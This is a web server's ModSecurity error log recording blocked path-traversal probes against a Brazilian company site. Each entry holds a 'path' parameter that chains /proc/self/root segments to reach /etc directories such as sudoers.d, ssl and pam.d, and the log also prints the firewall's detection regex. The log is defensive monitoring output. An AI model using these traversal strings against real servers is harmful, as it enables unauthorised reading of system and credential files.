[Fri Mar 20 06:37:57.554093 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.241.31:49670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VdRCii7xarUs8iHZXowAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:00.166521 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:39526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vdl1pVZ5mVmJwsFMfQQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:00.166525 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.241.31:44220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VdvXLqtnMIWvjpaKJlAAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:02.844346 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.241.31:44236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VejJ3M9BSuKP7CAYHcQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:04.223189 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:44250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VfPXLqtnMIWvjpaKJlQAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:05.523562 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.241.31:44260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VfV1pVZ5mVmJwsFMfQwAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:05.615094 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.243.128:38120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vfbninkcc-iUj5ApN8wAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:06.726911 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:44276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VfvqxLDW4GITHUkTUrwAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:07.918178 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:60726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vf_HIg5MgXLBnicPoxAAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:08.123131 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:38128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VgAF0L0L-SsrnPo5W_wAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:10.259954 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:60738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VgvXLqtnMIWvjpaKJmAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:11.636687 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.241.31:60750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VgxCii7xarUs8iHZXqgAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:12.995660 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.241.31:60754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VhAF0L0L-SsrnPo5XAAAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:14.357065 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:60768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VhvXLqtnMIWvjpaKJmwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:14.810926 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:37456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VhvqxLDW4GITHUkTUwQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:15.515149 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:60780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vh-oXxyEfFpUF8f9xTgAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:17.887322 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.241.31:60790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VifqxLDW4GITHUkTUxQAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:19.289950 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:58330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vi9a6ubjKNq_cu4bCRQAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:20.602327 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:58338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VjNa6ubjKNq_cu4bCSgAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:22.403583 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:37468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VjvqxLDW4GITHUkTUywAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:22.954816 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:58350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VjvqxLDW4GITHUkTUzAAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
